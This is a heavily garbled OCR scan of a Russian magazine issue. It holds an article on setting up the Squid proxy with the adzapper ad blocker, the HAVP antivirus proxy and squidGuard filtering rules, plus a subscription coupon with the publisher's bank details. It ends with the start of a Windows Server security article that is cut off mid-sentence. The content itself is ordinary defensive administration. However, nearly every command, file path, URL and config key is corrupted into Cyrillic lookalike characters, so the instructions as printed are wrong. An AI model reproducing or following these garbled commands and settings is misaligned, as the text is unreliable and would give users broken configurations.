ОШБ: НЕЩАДНО РЕЖЕМ БАННЕРЫ И ПРОВЕРЯЕМ НА ВИРУСЫ 



Несмотря на то, что кэширующий прокси-сервер Здиісі прекрасно справля- 
ется с задачей ограничения доступа к различным ресурсам, проверять фай- 
лы на вирусы и блокировать баннеры штатными средствами крайне пробле- 
матично. Здесь на помощь приходят сторонние разработки и дополнения. 



ВІ.АСКІ.І5Т С АР2АРРЕК 

Здиісі предоставляет несколько вариантов блокировки ресурсов — по 
ІР-адресу, ШИ или ключевому слову. Первые два метода достаточно просто 
реализовать за счет парочки асіийс ѣр_ассезз. Но тогда администратору 
придется обновлять список сайтов и адресов вручную. Проблему можно 
переложить на плечи проектов — от использования белых и черных списков 
с возможностью автоматического обновления, до фильтрации по ключевым 
словам и применения эвристического анализа. Есть и комбинированные 
решения. Например, ВаппегРікег ГрЬгоууу.сот/Ьаппегйкег) рассчитан 
на использование известных адресов баннерных сетей и шаблонов, однако 
последняя версия датирована 2004 годом, поэтому об автоматизации 
процедуры обновления Ыаск1і& и думать не стоит. Хотя имеющиеся шаблоны 
вполне можно использовать для блокировки баннеров и всплывающих окон. 
Аналогично работает иМЪСиагсІ Суууууу. игШкегбЪ . согп) , предлагающий 
бесплатное обновление баз в течение 60 дней. Есть и другие решения, но, к 
сожалению, большинство проектов давно не обновлялись. Поэтому выберем 
то, что поддерживается и доступно в репозитарии ЦЬипШ. Редиректор 
абгаррег Габгаррег.зЕпеО также использует списки ШИ, есть возможность 
автоматического обновления. Установить и настроить его весьма просто: 

$ арЬ-деІ: іпзЬаІІ асігаррег 

Собственно, все. Пакеты с подобными редиректорами обычно не превы- 



шают 100 Кб, поэтому установка проходит быстро. Чтобы прикрутить его 
к Здиісі, достаточно добавить в здиі с? . сопИ всего одну строку. Правда, 
в зависимости от версии Здиісі, строка будет отличаться. Например, в 
Здиісі 2.5, который лежит в репозитарии ІіЪітШ 6.06, и в новой 3.0 следует 
использовать параметр ге6ігесЬ_ргодгат\ 

гес!ігес1:_ргодгат /изг/Ъіп/асІгаррег .шгаррег 

В версии Здиісі 2.6 используется иг1_геѵѵгКе_рго§гат: 

иг1_гешгіЬе_ргодгат /изг/Ьіп/асІгаррег .шгаррег 

Вот и все настройки, но этого вполне хватит, чтобы после перезапуска Здиісі 
«зидо /еіс/іпіь .д/здиісі гезіагѣ» часть баннеров была заменена 
надписью «ТЫз із ад. зарред.». Будут блокированы также всплывающие 
окна и флэш-анимация. Для ежедневного обновления ЫаскИзГ (фактически 
самого скрипта абгаррег) достаточно добавить новое задание сгопѣаЬ : 

$ зибо сгопЬаЬ -е 

О о * * * гооЬ /изг/зкаге/йос/асІгаррег/ехатрІез/ирсЗаЬе- 
гаррег 

Работа скрипта обновления проста. С адреса абгаррег.БІ.пеИ/зсгірз/ 
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здиісі гесіігесС скачивается скрипт, который затем копируется 
на место /изг/Ып/асІгаррег. В самом конце абгаррег, в 
области БАТА, находится список шаблонов ТЛИ. Хотя опыт 
показывает, что его обновляют не очень часто. 

У конфигурационного файла /еіс/асізаррег . сопі настро- 
ек немного. Если установить значение: 

2АР_М0БЕ= " СЬЕАК " 

то будет использоваться «тихая» блокировка, без вывода ука- 
занной выше надписи. При желании текст легко подменить 
своим. Адрес, откуда загружаются картинки, указывается в 
двух переменных: 

2АР_ВА8Е=1іЬЬр : / /абгаррег . зоигсебогде . пеб/ 
гарз 

2АР_ВАЗЕ_55Ь=Ы:{:рз : / /абгаррег . зоигсебогде . 
пеб/гарз 

Никто не мешает здесь указать свой ЦКБ, — разработчики 
даже рекомендуют такой вариант. Для этого, естественно, 
необходим рабочий веб-сервер, например, АрасЬе. После ус- 
тановки абгаррег в каталоге /изг/зііаге/ 6 ос/аб. 2 аррег/ 
ехатріез/зарз находятся все нужные шаблоны. Теперь до- 
статочно в конфигурационном файле апача /еѣс/арасііе 2 / 
арасЬе 2 . сопі: указать алиас на этот каталог: 

$5ис1о тсес1і4/еІс/арасНе2/арасЬе2.сопі 

Аііаз / 2 арз /изг/зкаге/сіос/асігаррег/ехатріез/ 
гарз/ 

<Бігесбогу /изг/зкаге/сіос/асігаррег/ехатріез/ 
гарз/> 

Орбіопз РоІІо^ЗутЬіпкз Іпсіехез 
АІІсмОѵеггісІе Ьітіб 
Огсіег АІ1оѵ7,Бепу 
АІІОѴ7 бгот аіі 
</Бігесбогу> 

И поправить значение 2АР_ВА5Е: 

2АР_ВАЗЕ=1іЬЬр: / /ІосаІЬозб/гарз 

Не забывай перезапустить АрасЬе и Здиісі. Если есть желание, 
можно изменить файлы, находящиеся внутри каталога гарз, 
на свои. Увы, часть рекламы все же прорывается сквозь 
такой заслон. Чтобы не возиться с асі, можно добавить в эту 
схему Вбікег (Ъбікег.зб.пеб) . где используется эвристический 
алгоритм собственной разработки, позволяющий обнаружи- 
вать большую часть баннеров и блокировать всплывающие 
окна. Или добавить здиісЮиагсІ ( ѵѵѵ/ш.здиісі^иагсі.ог^) . речь о 
котором пойдет ниже. 

БОРЬБА С ВИРУСАМИ 

Баннеры — не самая неприятная вещь, которую можно 
встретить на сайтах. Большая часть вирусов загружается с 
различных ресурсов самими пользователями. Задача любого 
админа — не допустить подобного. Можно просто блокиро- 
вать файлы с определенным расширением или типом. Но 
это не всегда применимо. Поэтому давай разбираться, как 
добавить в нашу схему проверку трафика антивирусом. 

Для нашей цели подходят, как минимум, два проекта. Ре- 
шение ЗдиісІСІатАѵ ГзбпеС/ргоіесСз/здиісісІатаѵ) является 
редиректором, работающим с антивирусом СІатАѴ. Оно 
позволяет выборочно проверять файлы, основываясь на 



расширении или контексте. Несколько более продвинутый 
вариант — НАѴР (НТТР Апгі Ѵігиз Рюху, ѵлѵѵу.зегѵег-зісіе.сіе) 
— умеет проверять трафик на лету при помощи нескольких 
антивирусов (СІатАѴ, Р-Ргоі, Казрегзку, N0032, Зоркоз, АѴС, 
Ог.ѴѴеЬ и некоторых других) . НАѴР — не редиректор и может 
работать как в связке со Здиісі, так и в одиночку, обеспечивая 
прозрачное проксирование. 

Оба решения достаточно просты, гибки в настройках и рабо- 
тают стабильно. Использовав связку Здиісі + НАѴР, можно ре- 
ализовать несколько схем работы: здиісі^ Ьаѵр, Ьаѵр^ здиісі, 
здиісі^ Ьаѵр -> здиісі. Сюда можно легко добавить абгаррег и 
Ъбікег. Кроме того, НАѴР есть в репозитариях большинства 
дистрибутивов, что заметно упрощает процедуру установки, 
так как не нужно производить ряд операций вручную. Поэто- 
му познакомимся именно с ним. Ставим: 

$ зисіо арб-деб іпзбаіі Ьаѵр сіашаѵ 

В процессе инсталляции будет добавлен системный пользова- 
тель и группа Ьаѵр. Также будет установлен пакет сіатаѵ- 
бгезЬсіат, который необходим для автоматического обнов- 
ления антивирусных баз. В настройках по умолчанию НАѴР 
проверяет файлы на наличие вирусов при помощи ИЬсІатаѵ. 
При больших нагрузках необходимо дополнительно инстал- 
лировать пакет сіатаѵ-баетоп и затем изменить настрой- 
ки в конфиге НАѴР. Если в процессе установки вылезет 
ошибка вроде «с1_1оайд.Ь6.іг () : Сап'ѣ деЬ збабиз 
оі /ѵаг/1іЪ/с1атаѵ/ Опе ог тоге зсаппегз іаііей 
б о іпіѣіаііге!», это означает, что ИЬсІатаѵ на момент 
запуска НАѴР не установлен. Просто введи «з и гіо арі-деѣ 
-Т іпзЬаІІ». 

Сейчас НАѴР и Здиісі работают каждый сам по себе. Запустив 
пебз ба б, ты увидишь, что стал прослушиваться порт 8080 
(напомню, что здиісі по умолчанию работает на 3128) . 

Для проверки работоспособности НАѴР настраиваем веб- 
браузер на работу через зегѵег : 8080, заходим на страницу 
тѵш.еісаг.ог^/ апгі ѵігиз Гезб бііе.Ьгіп и пробуем скачать 
тестовый вирус. Если в ответ получаем сообщение, что файл 
заблокирован, идем дальше. 

Сначала рассмотрим, как подключить НАѴР в качестве Рагепб 
рюху для Здиісі. То есть — клиент подключается к Здиісі, а 
Здиісі через НАѴР уже выходит в интернет. Это весьма простой 
в реализации и к тому же более рациональный вариант, 




> ІП^О 

• Хорошей альтерна- 
тивой НАѴР является 
БдиісіСІатАѵ [ збпеі/ 
ргоіесіз/здиісісіатаѵ ). 
Он поддерживает 
только СІатАѴ, чего 
для большинства 
ситуаций — вполне 
достаточно. 

• ВаппегРіІіег 

( рИгодду.сот/ 
ЬаппегШег ) рассчитан 
на использование 
известных адресов 
баннерных сетей и 
шаблонов. 

• В ВШег ( ЫіЬег. 
збпеі і использует- 
ся эвристический 
алгоритм собственной 
разработки, позволя- 
ющий обнаруживать 
большую часть бан- 
неров и блокировать 
всплывающие окна. 
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> Ііпкз 

Полный список 
связанных со Бцііісі 
проектов есть на 
ігеБІітеаі.пеі . 

Список ресурсов, 
предоставляющих 
готовые Ыаскіізі: 
для зриісібиагсі и 
подробную докумен- 
тацию, ты найдешь на 
сайте проекта ѵѵѵѵѵѵ. 
здиісідиагсі.огд . 



так как весь входящий трафик проверяется антивирусом, а 
страницы из кэша Здиісі выдаются без проверки. Открываем 

здиісЗ. сопИ ипишем: 

$5иботсебіІ/еІс/5диіс1/5диісІ.согб 

сас1іе_реег 127 . О . О . 1 рагепС 8080 0 по-фіегу 
по-сіідезі: по-пеСдЪ-ехсЬапде беіаиіс 
сас1іе_реег_ассезз 127 .0.0.1 аііотс аіі 

# Будем проверять только НТТР 
асі Зсап_НТТР ргоСо НТТР 
пеѵег_сіігесС а11о\л7 5сап_НТТР 

Подключаемся к сайту Еісаг и проверяем, как работает ука- 
занная схема. Добавляем в сгоШаЪ строчку для автоматичес- 
кого обновления антивирусных баз: 

0 * * * * /изг/Ъіп/ІгезІісІат -фііеС 

В итоге мы получили полнофункциональную систему, кэши- 
рующую трафик, блокирующую вирусы и рекламу. 

КОНФИГУРАЦИОННЫЙ ФАЙЛ НАѴР 

Как видишь, в предыдущем примере мы даже не заглянули в 
конфиг НАѴР. Все должно работать и без нашего вмешатель- 
ства, с параметрами по умолчанию. Если понадобится реа- 
лизовать обратную схему (когда в качестве РагепГ выступает 
Зциісі), тогда, наоборот, все настройки производятся в конфи- 
гурационном файле НАѴР — /еЬ с/Ьаѵр/Ьаѵр . сопЛі д: 

$ зисіо тсесііі /еІс/Наѵр/Наѵр.сопйд 

# Порт и адрес , на котором принимает соединения 
НАѴР 

РОКТ 8080 

ВШБ_АВВКЕ38 127.0.0.1 

# Можно дополнительно указать ІР-адрес интер- 
фейса для исходящих пакетов 
#80ШСЕ_АВВКЕЗЗ 1 . 2 . 3 . 4 

# Указываем Здиісі в качестве РагепС прокси 
РАРЕЫТРПОХУ 127.0.0.1 

РАРЕЫТРОРТ 3128 

Теперь подключаемся веб-браузером к порту 8080 и при 
подключении к серверу проходим цепочку НАѴР Зциісі -> 
Веб-сервер. Есть несколько моментов в конфигурационном 
файле, на которые хотелось бы обратить внимание. Напри- 
мер, пользователь и группа, от имени которых работает 
НАѴР, указаны в параметрах: 



Б8ЕК Каѵр 
СРОБР Ьаѵр 

НАѴР должен иметь право чтения и записи во все рабочие 
каталоги. Кроме того, при работе с антивирусом часто появ- 
ляется ошибка «Регтіззіопз бепіесі». Чтобы в дальнейшем не 
было проблем с доступом, я добавляю пользователя Каѵр в 
группу сіатаѵ. 

Количество процессов, запускаемых демоном НАѴР, опреде- 
ляется двумя параметрами: 

ЗЕРѴЕКШМВЕР 8 
МАХЗЕКѴЕКЗ 100 

Значения по умолчанию подходят для домашнего исполь- 
зования или для небольшой организации. ЗЕКѴЕКЖІМВЕК 
устанавливается в зависимости от количества клиентов. 

Вот еще два не менее ценных параметра: 

ЗСА№ГЕМРЕ ІЬЕ /ѵаг/зрооі/ Каѵр / Ъаѵр - ХХХХХХ 
ТЕМРВІР /ѵаг/Стр 

Здесь указывается размещение временных файлов НАѴР 
и каталог для временных файлов антивируса. В руководст- 
вах, доступных в Сети, и документации НАѴР сказано, что 
ЗСАМГЕМРРІЬЕ должен находиться в разделе, смонтирован- 
ном с использованием параметра тапб. Майнтейнер пакета 
упростил нам задачу, и в стартовом скрипте /еіс/іпі ѣ . 

( і/Ьаѵр есть все, что нужно. В этом можно убедиться, введя 
команду тоипі после загрузки НАѴР: 

$ тоипС 

/ѵаг/ІіЬ/Каѵр/Ііаѵр. Іоор оп /ѵаг/зрооі /Каѵр 
Суре ехСЗ (гѵ^тапсі, 1оор=/<іеѵ/1оор/0 ) 

Хотя при больших нагрузках на сервер лучше вынести этот 
каталог в ОЗУ: 

$ зисіо шоипС -С Сшріз -о зІ2е=100М,тапсЗ Стріз 
/ ѵаг / зрооі /Каѵр 

В комплекте НАѴР есть несколько шаблонов веб-страниц, 
которые выводятся юзеру при обнаружении вируса и возник- 
новении других проблем. Подключаем русские шаблоны: 

ТЕМРЬАТЕРАТН /еСс/Ьаѵр/СеіпрІаСез/ги 
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КонфигзриісІбиагсІ 

Кстати, можно подправить Ъйпі-файлы внутри этого каталога по своему 
вкусу. В НАѴР также поддерживаются белый и черный списки. Вся инфор- 
мация из первого проходит без проверки на вирусы, а ИКЬ, занесенные во 
второй список, блокируются: 

ШІТЕЫЗТРІЕЗТ Бгие 
ШІТЕЫЗТ /еБс/Ъаѵр/ѵгіііБеІізБ 
ВЬАСКЫЗТ /еБс/Ъаѵр/ЫаскІізБ 

Внутри этих файлов содержатся шаблоны ЦКБ. Например, если занести 
в ѵѵііііеіізі: строку « */*.ді Е», тогда все СІР-файлы будут проходить без 
проверки. Некоторые типы архивов СІатАѴ проверять не умеет. Чтобы 
пользователь не получал сообщение об ошибке, разрешим пропускать 
такие файлы, а заодно отключим сканирование изображений, ограничим 
размер проверяемых объектов и произведем небольшую оптимизацию: 

РАІЬЗСАЫЕККОК. Баізе 
ЗСАШМАСЕЗ Баізе 
МАХЗСАМЗІ2Е 5000000 

ЗТКЕАМБЗЕКАСЕЫТ Ріауег ДОіпатр іТипез ОиіскТіше Аисііо 
ЕМА/ МАБ/ РооЬаг2 000 ХММЗ 

Теперь разберем, как подключается к НАѴР антивирус СІатАѴ. По умолча- 
нию проверка производится при помощи ІіЪсІатаѵ: 

ЕЫАВЬЕСБАМЫВ Ыие 
СБАМБВБІК. /ѵаг/ІіЪ/сІатаѵ 

Причем, нужно проследить, чтобы параметр СЬАІѴГОВЭІІІ указывал на тот 
же каталог, что и параметр В а Б аЬа б еВі гесЬ огу в файле /еЬс/сІатаѵ/ 
сіатй. сопЕ. Впрочем, если в журнале НАѴР /ѵаг/іод/ііаѵр/ассезз . 
Іод видим запись вроде: 

— ІпіБіаІігіпд СІатАѴ ЬіЬгагу Зсаппег 

СІатАѴ: Бзіпд сіаБаЪазе бігесБогу: /ѵаг/ІіЬ/сІатаѵ/ 
СІатАѴ: Боасіесі 244019 зідпаБигез (епдіпе 0.92) 

СІатАѴ ЬіЬгагу Зсаппег раззесі ЕІСАВ. ѵігиз БезБ (Еісаг- 
ТезБ-ЗідпаЪшге) 

— АН зсаппегз іпіБіаІігесІ 
Ргосезз ІБ: 8406 

— значит, все путем, и ничего трогать не нужно. Далее в Ъаѵр.сопй§ 
идут параметры, определяющие поведение СІатАѴ при сканировании 
зашифрованных архивов, максимальный размер проверяемого файла и 
др. Чтобы вместо ІіЪсІатаѵ использовался демон сіатб, комментируем 
предыдущие строки и пишем: 



ЕЫАВЬЕСЬАМБ Ігие 

СБАМБЗОСКЕТ /ѵаг/гип/сіатаѵ/сіатсі . сЦ 

Значение второго параметра берем из переменной Ьоса ІЗоскеі: файла 
с 1 атб. . с опЕ. Это как раз тот случай, когда включение Ъаѵр в группу 
сіатаѵ будет не лишним. 

ТЯЖЕЛАЯ АРТИЛЛЕРИЯ — 50Ш0С1МК0 

Без здиісЮиагсІ описание полезных дополнений к Здиіб было бы непол- 
ным. Возможностей у него предостаточно, часто админы не используют 
и половину из них. С помощью здиісіСиагсі можно отфильтровывать и 
переадресовывать запросы по адресам, именам и регулярным выраже- 
ниям, распределять пользователей по группам с заданием собственных 
настроек и указанием временного промежутка. Например, разрешить 
группе посещать только ресурсы из белого списка. Для ускорения обра- 
ботки больших списков они хранятся в ВегкеІеуЭВ. Установка в ЦЪипШ 
сложностей не вызывает: 

$ зисіо арБ-деБ іпзБаІІ зфдісідиагсі 

Подключается здиібСиагб к Здиісі также, как и остальные редиректоры 
— просто добавляем в здиіб . сопЕ строку для запуска: 

гесіігесБ_ргодгат /изг /Ьіп/ здиісЮиагсІ 
гес!ігесБ_с1іі1(ігеп 5 
гесіігесБог_Ъуразз оп 

Все настройки здиібСиагб производятся в конфигурационном файле 
/е Б с/здиі с?/здиі бдиагб. . сопЕ. Но вначале нужно пояснить струк- 
туру БД. Переменная бЪЪоте указывает на каталог, в котором хранятся 
описания ресурсов. В ЦЪипШ и некоторых других дистрибутивах — это 
/ѵаг / ІіЪ/ здиісідиагб./ ’бЪ. Приустановке с помощью пакетов каталог 
пуст, поэтому придется самому позаботиться о его наполнении. Список 
Ыаск1і& можно взять как из архива исходных текстов программы, так и 
выбрать любой по ссылке ВІаскІізБз на сайте проекта. Списки, предлага- 
емые сторонними организациями, гораздо полнее и обновляются чаще, 
поэтому их и будем использовать. Например : 

$ мдеБ -с ѵллтм.зЪаІІаІізБ.сІе/ВоѵтІоасіз/зЪаІІаІізБ.Баг.дг 
$ зисіо Баг хгѵі зЪаІІаІізБ . Баг .дт. -С /ѵаг/ІіЬ/зсдиісідиагсі/сіЪ 

В результате, внутри ты обнаружишь целую структуру каталогов с назва- 
ниями вроде абз, ѵѵагег и прочее. Порядок следования очень важен, ведь 
в правилах указывается путь относительно бЪЪоте. В каждом каталоге 
могут находиться следующие файлы: 

• сіотаіпз — список доменных имен и адресов сайтов (ас?, соипѣ . сот); 

• игіз — список конкретных ссылок на ресурс (зі Бе . сот/Ьаппегз); 

• ехргеззіопз — список регулярных выражений, ожидаемых в ШИ 
(абик | §іг1з | аѵі | трЗ и т.д.) . 

Списков ехргеззіопз в большинстве ЫаскИзБ мало и злоупотреблять ими не 
стоит, так как их использование сильно нагружает систему. 

Расскажу о еще одном моменте, связанном с обновлением списка. Например, 
может возникнуть ситуация, когда требуется добавить или убрать ресурс 
из ЫаскІізБ. Если сделать это в одном из указанных выше файлов, то при об- 
новлении все изменения будут потеряны. Чтобы избежать такого, сохраняй 
изменения в нужном подкаталоге в файлах с расширением с?і В В. Например, 
рядом с оригинальным сіотаіпз пишем сіотаіпз . сіі ЕЕ. Формат его прост: 

+а<із . (іотаіп . сот 
— сіотаіп . сот 

Первый ресурс будет добавлен в базу, второй убран. При обновлении спис- 
ка ситуация не изменится. 
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Баннеры, заблокированные АсІгарресІ 



СОЗДАЕМ ПРАВИЛА 

Если в Здиісі ресурсы блокируются при помощи связки ас1+1тр_ассе55, то в 
здиісІСиагб таких параметров намного больше. Например, чтобы описать и 
затем блокировать ресурсы, содержащие рекламу, добавляем такое правило: 

$5ііс1о тсегііі/еіс/зяиігі/зциісідиагсі.соп^ 

безъ а бѵ { 

ботаіпіізі: абѵ/ботаіпз 
игііізі: абѵ/игіз 
ехргеззіопзіізб абѵ/ехргеззіоп 
гебігесі: ЬЪЪр : //ІосаІІіозЪ/ЪІоск.ЫлгіІ 

} 

сіезі: ѵ/агег { 

(іошаіпіізі: магег/ботаіпз 
игііізі: ѵ/агег/игіз 

} 

асі { 

беіаиП: { 

разз Іасіѵ Імагег аіі 

} 

} 

В примере была создана категория абѵ, где при помощи трех параметров 
ботаіпіізі:, игііізі: и ехргеззіопзіізі: подключаются файлы, находящиеся в 
каталоге /ѵаг/ІіЬ/здиібдиагб/бЬ/абѵ. Также создаются описания 
для остальных ресурсов. Названия можно брать любые (обычно их выби- 
рают по названию каталога или по назначению, чтобы потом легче было 
ориентироваться) . В документации приведен список зарезервированных 
слов, советую с ним ознакомиться. Список АСЬ с действием беіаик является 
правилом по умолчанию. 

Параметр без ё аналогичен асі в здиісі. сопЛ — описывает внешний ре- 
сурс. Чтобы указать клиентские подключения, применяется зге. В качестве 
значения ему можно передать отдельный ІР-адрес, адрес сети, домен или 
список пользователей. 

зге сІіепЬз { 

ір 192.168.1.2-192.168.1.50 

} 

зге асЗшіпз { 

ір 192.168.1.55, 192.168.1.150 

} 

Временной диапазон задается просто: 

Ъіте ѵгогкЪоигз { 

меекіу тЪѵбіЕ 09:00-18:00 
баке * . 04 . 01 

} 

Под описание ѵѵогк-гіте попадают дни от понедельника по пятницу (ис- 
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Параметры в асігаррег.сопі 

пользуются первые буквы английских слов) и время с 9 до 18. Плюс, сюда 
же входит первое апреля каждого года. 

Время можно использовать прямо в описании клиентов: 

зге шападегз { 

ір 192.168.0.0/24 
ѵ/іЫііп ѵ70гкЬ.оигз 

} 

Или непосредственно в асі. Настраиваем списки контроля доступом: 

$зисіо тсесііі/еіс/здиіб/здиісідиагсі.согй 

асі { 

# Этой группе режем все, и будем пускать менеджеров 
только в ѵгогкЬоигз 

шападегз { 

разз Іѵ/агег ! сітаі: Ірогпо Іадгеззіѵе Ібгидз Іабз аіі 

} 

# В рабочее время режем все 
сііепкз ш-Ыііп Ѵ70гкЬоигз { 

разз Імагег Ісііаі: Ірогпо Іадгеззіѵе Ібгидз Іасіз аіі 
} еізе { 

# После работы только рекламу : ) 
разз Іабз аіі 

} 

} 

С целью упрощения я не добавлял описания ресурсов сЬаЦ рогпо и других. 
Когда правила записаны, создаем базу и устанавливаем права: 

$ зибо зсщібСиагб -б -С аіі 

$ зибо сЬоші -К. здиіб /ѵаг/1іЪ/здиібдиагб/бЬ/* 

Хотя это необязательный шаг — при первой загрузке базы будут созданы 
автоматически — но так можно убедиться в отсутствии ошибок. Для об- 
новления конкретного списка вместо аіі указываем на конкретный файл. 
Если обновление производится из бШ-файла, то используем параметр '-и': 

$ зибо зсддібСиагб -и /ѵаг/1іЬ/здиібдиагб/бЬ/абз/ 
бошаіпз . бііі 

После чего перезапускаем Здиіб и проверяем работу. 

ЗАКЛЮЧЕНИЕ 

Как видишь, использование дополнительных решений позволяет 
превратить Здиіб в настоящую боевую машину, которая будет блокиро- 
вать все, что не разрешено администратором. Обилие функций никак 
не усложняет дальнейшее сопровождение системы. Достаточно лишь 
настроить автоматическое обновление блэклистов и антивирусных баз, 
а затем добавлять или удалять пользователей ! іні 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

1980 руб. ( на 1 5% дешевле чем 

при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО йѴй + ХАКЕР дЧд + ГГ СПЕЦ Сй: 

- Один номер всего за 147 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ 



ЗА 6 МЕСЯЦЕВ 

Подписка на журнал «ХАКЕР+ОѴй» на 6 месяцев стоит 
1 080 руб. 




ВЫГОДА • ГАРАНТИЯ • СЕРВИС 1 

КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав § 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. % 
діс.ги. 

2. Оплатите подписку через Сбербанк . і§ 

3. Вышлите в редакцию копию подписных документов — купона и -7 

квитанции — любым из нижеперечисленных способов: | 

• по электронной почте зиЬзсгіЬе@дІс.ги; I 

• по факсу 8 (495) 780-88-24; I 

• по адресу 1 1 9021 , Москва, § 

ул. Т имура Фрунзе, д. 1 1 , стр. 44, і 

ООО «Гейм Лэнд», отдел подписки. щ 

ВНИМАНИЕ! § 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в У 

редакцию по факсу или электронной почте; Ц 

• в течение 20 рабочих дней после отправки подписных документов по Ц 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем Ц 
случае предварительно отсканировав или сфотографировав документы. § 
Подписка оформляется с номера, выходящего через один кален- 1 
дарный месяц после оплаты. Например, если вы производите оплату в ц 
ноябре, то журнал будете получать с января. 



По всем вопросам 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іп!о@дІс.ги или прояснить на сайте ѵѵѵѵѵѵ.СЮ.ги 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 

[ ~~| на 6 месяцев 
□ на 1 2 месяцев 

начиная с 2008г. 

I I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 
Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 



Квитанция 



ИНН 7729410015 
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>> ХАКЕР.РКО 




ЛИНИИ ОБОРОНЫ 



ТОП-Ю ОШИБОК АДМИНИСТРИРОВАНИЯ ѴѴІЫР0ѴѴ5 5ЕКѴЕК 2003/2008 



Легкость установки и управления серверными версиями ѴѴіпсіоѵѵб создает 
иллюзию, что администрировать подобные системы проще простого. Поче- 
му же тогда виндовые серваки так часто ломают? ! Составив ТОП-10 ошибок 
управления ѴѴІп2кЗ/ѴѴІп2к8 и подробно прокомментировав каждую из них, 
мы надеемся помочь как начинающим, так и матерым администраторам. 



#1 — ЗАПЛАТКИ И ОБНОВЛЕНИЯ 

Многие администраторы вообще не устанавливают никаких заплаток, 
считая, что никто их атаковать не будет. Это — всего лишь распростра- 
ненное заблуждение. Основная угроза исходит от червей, сканирующих 
ІР-адреса и выявляющих незалатанные машины, даже если это домашний 
сервер, на котором нет никакой конфиденциальной информации. 
Обновляться все-таки надо, причем обновлять следует не только операци- 
онную систему, но и все используемые приложения, где также обнаружи- 
ваются критические ошибки, естественно, не устраняемые обновлениями 
от МІСГ050ІІ:. В идеале, нужно составить список используемого програм- 
много обеспечения и регулярно посещать сайты производителей на 
предмет поиска обновлений. 

Кстати говоря, заплатки от МісгозоЛ содержат одну очень неприятную 
особенность, граничащую с ошибкой, а именно — не проверяют номера 
версий замещаемых исполняемых файлов/динамических библиотек. 
Допустим, у нас есть две заплатки А и В, исправляющие ошибки в 
кете 13 2 . 6.1 1. Поскольку установщик не отслеживает последователь- 
ность обновлений, то, установив заплатки в обратном порядке (инстал- 
лятор при этом даже не пикнет!), мы закроем дырку А, но откроем дырку 



В — ведь кегпе132 .611 (как и любая другая динамическая библиотека) 
всегда замещается целиком, а не частями ! 

При автоматическом обновлении никаких проблем не возникает, так как 
заплатки ставятся в том порядке, в котором они выпускаются. Но если 
мы качаем их вручную, то необходимо в свойствах каждого файла найти 
внутреннюю версию и дату создания, а затем составить «план» последова- 
тельности установки заплаток. Впрочем, тут не обходится без подводных 
камней. Иногда МісгозоВ: выпускает одни и те же заплатки по несколько 
раз. Допустим, сначала выходит А, исправляющая ошибки Е1, Е2, ЕЗ, после 
чего выходит В, исправляющая Е4, Е5, Е6, а затем. . . выходит обновленная 
заплатка А, исправляющая все те же Е1, Е2, ЕЗ, а обновленной заплатки В 
— нет. Установка А поверх уже установленной В открывает дыры Е4, Е5, 
Е6. Так что с заплатками нужно быть очень внимательным и всегда читать 
бюллетени безопасности, чего практически никто делать не собирается. 

В целях экономии трафика ряд интернет-провайдеров устанавливает 
свои собственные сервера обновлений, предлагая клиентам прописать 
их адреса в настройках ѴѴіпбо^ѵз ІІрбаЩ. Соблазн очень велик, но угроза 
быть атакованным — еще выше ! МісгозоВ: прилагает огромные усилия для 
защиты своих серверов, вкладывая в безопасность немалые деньги. Что 
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Соге 2 Рио — процессор, в котором обнаружено рекордное число критических ошибок 



же касается провайдеров, то . . . атаковать их порядка на три 
проще (и их взламывают, а затем подсовывают троянизиро- 
ванные обновления). 

Выход: скачивай заплатки только у самих поставщиков, при 
этом, чтобы избежать вероятности «подмятия» доменного 
имени с перенаправлением на другой узел, не используй 
БЫЗ-сервер провайдера. Установи свой собственный БКЗ, 
напрямую обращающийся к корневым доменным серверам 
по ТСР-протоколу, и заблокируй порт 53/ТГОР на брандмауэре 
для отсечения подложных БКЗ-ответов. 

#2 — БАГИ В ПРОЦЕССОРАХ 

Ругая ѴѴіпсіоѵѵз (и отчасти Ьіпих) за то, что программное 
обеспечение наших дней дыряво, как ведро бездна, мы 
почему-то забываем об аппаратной оснастке, считая «железо» 
совершенно непогрешимым. Увы, процессоры не лишены 
недостатков. 

Самый громкий баг в Репізшп был обнаружен в 1995 году 
и продемонстрирован на следующем примере: х - (х/у) *у, 
результат которого (если только у ! = 0) должен быть 
равен нулю, однако при определенных значениях х и у (х = 
4195835, у = 3145727) процессор выдавал... 256! Потрясаю- 
щая точность, не правда ли? 

Журналисты подхватили сенсацию и вынудили Іпіеі пойти на 
замену процессоров, чего она изначально делать не хотела, 
доказывая, что людям, далеким от математики, точные 
вычисления не нужны, а вероятность проявления ошибки 
на произвольном (а неумышленно подготовленном) наборе 
данных близка к нулю. 

С тех пор сообщений об ошибках в ЦП как будто бы не 
отмечалось. И потому заявление ТЪео сіе Яааск’а (ведущего 
